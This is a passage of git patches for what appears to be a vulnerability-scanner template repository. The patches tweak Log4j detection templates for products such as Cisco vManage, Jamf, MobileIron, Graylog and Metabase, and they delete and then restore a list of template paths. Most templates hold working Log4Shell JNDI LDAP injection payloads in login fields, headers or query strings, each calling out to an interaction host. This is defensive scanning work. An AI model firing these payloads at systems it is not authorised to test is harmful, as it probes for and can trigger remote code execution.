username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password= matchers-condition: and matchers: @@ -55,6 +55,16 @@ http: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 diff --git a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml index d25ab91b691..3ae7726c647 100644 --- a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml +++ b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml @@ -31,7 +31,7 @@ http: @timeout: 10s POST /suite-auth/login HTTP/1.1 Host: {{Hostname}} - Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}} + Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}} Content-Type: application/json {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"} diff --git a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml index 135e266a538..92807fdaab7 100644 --- a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml +++ b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml @@ -32,7 +32,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}}/ccmadmin/showHome.do - appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}&j_password=admin + appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin matchers-condition: and matchers: @@ -51,6 +51,12 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 diff --git a/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml b/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml index dfce16b4afc..1f57d654108 100644 --- a/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml +++ b/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml @@ -33,7 +33,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}} - j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}&j_password=admin&submit=Log+In + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin&submit=Log+In matchers-condition: and matchers: diff --git a/http/vulnerabilities/code42/code42-log4j-rce.yaml b/http/vulnerabilities/code42/code42-log4j-rce.yaml index abbd0c80d8a..63874df01bd 100644 --- a/http/vulnerabilities/code42/code42-log4j-rce.yaml +++ b/http/vulnerabilities/code42/code42-log4j-rce.yaml @@ -29,7 +29,7 @@ variables: http: - method: GET path: - - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/test}&url=https://localhost' + - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&url=https://localhost' matchers-condition: and matchers: diff --git a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml index a54153a2519..96484eaa58c 100644 --- a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml @@ -34,7 +34,7 @@ http: Referer: {{RootURL}} Content-Type: application/x-www-form-urlencoded - username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/test}&password= + username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password= matchers-condition: and matchers: diff --git a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml index 7ac2f291001..09a84db2757 100644 --- a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml @@ -33,7 +33,7 @@ http: Referer: {{RootURL}}/mifs/user/login.jsp Content-Type: application/x-www-form-urlencoded - j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}&j_password=password&logincontext=employee + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=password&logincontext=employee matchers-condition: and matchers: diff --git a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml index aafce277c43..b7850d65953 100644 --- a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml +++ b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml @@ -27,7 +27,7 @@ variables: http: - raw: - | - GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D HTTP/1.1 + GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.search.{{interactsh-url}}%7D HTTP/1.1 Host: {{Hostname}} { diff --git a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml index 6688348f264..40f6be06556 100644 --- a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml +++ b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml @@ -36,7 +36,7 @@ http: Origin: {{RootURL}} Referer: {{RootURL}}/goanywhere/auth/Login.xhtml - formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}} + formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.name.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}} cookie-reuse: true matchers-condition: and diff --git a/http/vulnerabilities/other/graylog-log4j.yaml b/http/vulnerabilities/other/graylog-log4j.yaml index 982527b8fe9..463c6fce764 100644 --- a/http/vulnerabilities/other/graylog-log4j.yaml +++ b/http/vulnerabilities/other/graylog-log4j.yaml @@ -35,7 +35,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}} - {"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"} + {"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"} matchers-condition: and matchers: diff --git a/http/vulnerabilities/other/metabase-log4j.yaml b/http/vulnerabilities/other/metabase-log4j.yaml index bd2d6791423..1603042be74 100644 --- a/http/vulnerabilities/other/metabase-log4j.yaml +++ b/http/vulnerabilities/other/metabase-log4j.yaml @@ -26,7 +26,7 @@ variables: http: - method: GET path: - - "{{BaseURL}}/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}" + - "{{BaseURL}}/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.url.{{interactsh-url}}}" matchers-condition: and matchers: From 812fb97fe7cb130dd6a21d21f3eba3c161f07072 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 May 2023 00:05:20 +0530 Subject: [PATCH 09/10] Delete .new-additions --- .new-additions | 55 -------------------------------------------------- 1 file changed, 55 deletions(-) delete mode 100644 .new-additions diff --git a/.new-additions b/.new-additions deleted file mode 100644 index 7d2c21d7bc0..00000000000 --- a/.new-additions +++ /dev/null @@ -1,55 +0,0 @@ -cves/2017/CVE-2017-16894.yaml -cves/2020/CVE-2020-10199.yaml -cves/2021/CVE-2021-25078.yaml -cves/2021/CVE-2021-35250.yaml -cves/2022/CVE-2022-0747.yaml -cves/2022/CVE-2022-0769.yaml -cves/2022/CVE-2022-0773.yaml -cves/2022/CVE-2022-0846.yaml -cves/2022/CVE-2022-0864.yaml -cves/2022/CVE-2022-1903.yaml -cves/2022/CVE-2022-2219.yaml -cves/2022/CVE-2022-24223.yaml -cves/2022/CVE-2022-25485.yaml -cves/2022/CVE-2022-25486.yaml -cves/2022/CVE-2022-25487.yaml -cves/2022/CVE-2022-25488.yaml -cves/2022/CVE-2022-25489.yaml -cves/2022/CVE-2022-25497.yaml -cves/2022/CVE-2022-27926.yaml -cves/2022/CVE-2022-28032.yaml -cves/2022/CVE-2022-3062.yaml -cves/2022/CVE-2022-37190.yaml -cves/2022/CVE-2022-37191.yaml -cves/2022/CVE-2022-38295.yaml -cves/2022/CVE-2022-38296.yaml -cves/2022/CVE-2022-38467.yaml -cves/2022/CVE-2022-41441.yaml -cves/2022/CVE-2022-42094.yaml -cves/2022/CVE-2022-4321.yaml -cves/2023/CVE-2023-0099.yaml -cves/2023/CVE-2023-22620.yaml -cves/2023/CVE-2023-22897.yaml -cves/2023/CVE-2023-27008.yaml -cves/2023/CVE-2023-27159.yaml -cves/2023/CVE-2023-27179.yaml -cves/2023/CVE-2023-29084.yaml -default-logins/trassir/trassir-default-login.yaml -exposed-panels/appwrite-panel.yaml -exposed-panels/aspect-control-panel.yaml -exposures/logs/yii-error-page.yaml -misconfiguration/apollo-adminservice-unauth.yaml -misconfiguration/default-spx-key.yaml -misconfiguration/sql-server-report-viewer.yaml -misconfiguration/thinkphp-errors.yaml -network/detection/msmq-detect.yaml -network/enumeration/beanstalk-service.yaml -osint/hashnode.yaml -osint/imgbb.yaml -osint/rubygems.yaml -technologies/default-apache-shiro.yaml -technologies/switch-protocol.yaml -vulnerabilities/generic/cache-poisoning-xss.yaml -vulnerabilities/huawei/huawei-firewall-lfi.yaml -vulnerabilities/others/universal-media-xss.yaml -vulnerabilities/wordpress/ldap-wp-login-xss.yaml From a40d92e53b3f9650e476aa54df2dab3da6c57432 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Thu, 11 May 2023 13:09:54 +0530 Subject: [PATCH 10/10] Revert "Delete .new-additions" This reverts commit 812fb97fe7cb130dd6a21d21f3eba3c161f07072. --- .new-additions | 55 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 55 insertions(+) create mode 100644 .new-additions diff --git a/.new-additions b/.new-additions new file mode 100644 index 00000000000..7d2c21d7bc0 --- /dev/null +++ b/.new-additions @@ -0,0 +1,55 @@ +cves/2017/CVE-2017-16894.yaml +cves/2020/CVE-2020-10199.yaml +cves/2021/CVE-2021-25078.yaml +cves/2021/CVE-2021-35250.yaml +cves/2022/CVE-2022-0747.yaml +cves/2022/CVE-2022-0769.yaml +cves/2022/CVE-2022-0773.yaml +cves/2022/CVE-2022-0846.yaml +cves/2022/CVE-2022-0864.yaml +cves/2022/CVE-2022-1903.yaml +cves/2022/CVE-2022-2219.yaml +cves/2022/CVE-2022-24223.yaml +cves/2022/CVE-2022-25485.yaml +cves/2022/CVE-2022-25486.yaml +cves/2022/CVE-2022-25487.yaml +cves/2022/CVE-2022-25488.yaml +cves/2022/CVE-2022-25489.yaml +cves/2022/CVE-2022-25497.yaml +cves/2022/CVE-2022-27926.yaml +cves/2022/CVE-2022-28032.yaml +cves/2022/CVE-2022-3062.yaml +cves/2022/CVE-2022-37190.yaml +cves/2022/CVE-2022-37191.yaml +cves/2022/CVE-2022-38295.yaml +cves/2022/CVE-2022-38296.yaml +cves/2022/CVE-2022-38467.yaml +cves/2022/CVE-2022-41441.yaml +cves/2022/CVE-2022-42094.yaml +cves/2022/CVE-2022-4321.yaml +cves/2023/CVE-2023-0099.yaml +cves/2023/CVE-2023-22620.yaml +cves/2023/CVE-2023-22897.yaml +cves/2023/CVE-2023-27008.yaml +cves/2023/CVE-2023-27159.yaml +cves/2023/CVE-2023-27179.yaml +cves/2023/CVE-2023-29084.yaml +default-logins/trassir/trassir-default-login.yaml +exposed-panels/appwrite-panel.yaml +exposed-panels/aspect-control-panel.yaml +exposures/logs/yii-error-page.yaml +misconfiguration/apollo-adminservice-unauth.yaml +misconfiguration/default-spx-key.yaml +misconfiguration/sql-server-report-viewer.yaml +misconfiguration/thinkphp-errors.yaml +network/detection/msmq-detect.yaml +network/enumeration/beanstalk-service.yaml +osint/hashnode.yaml +osint/imgbb.yaml +osint/rubygems.yaml +technologies/default-apache-shiro.yaml +technologies/switch-protocol.yaml +vulnerabilities/generic/cache-poisoning-xss.yaml +vulnerabilities/huawei/huawei-firewall-lfi.yaml +vulnerabilities/others/universal-media-xss.yaml +vulnerabilities/wordpress/ldap-wp-login-xss.yaml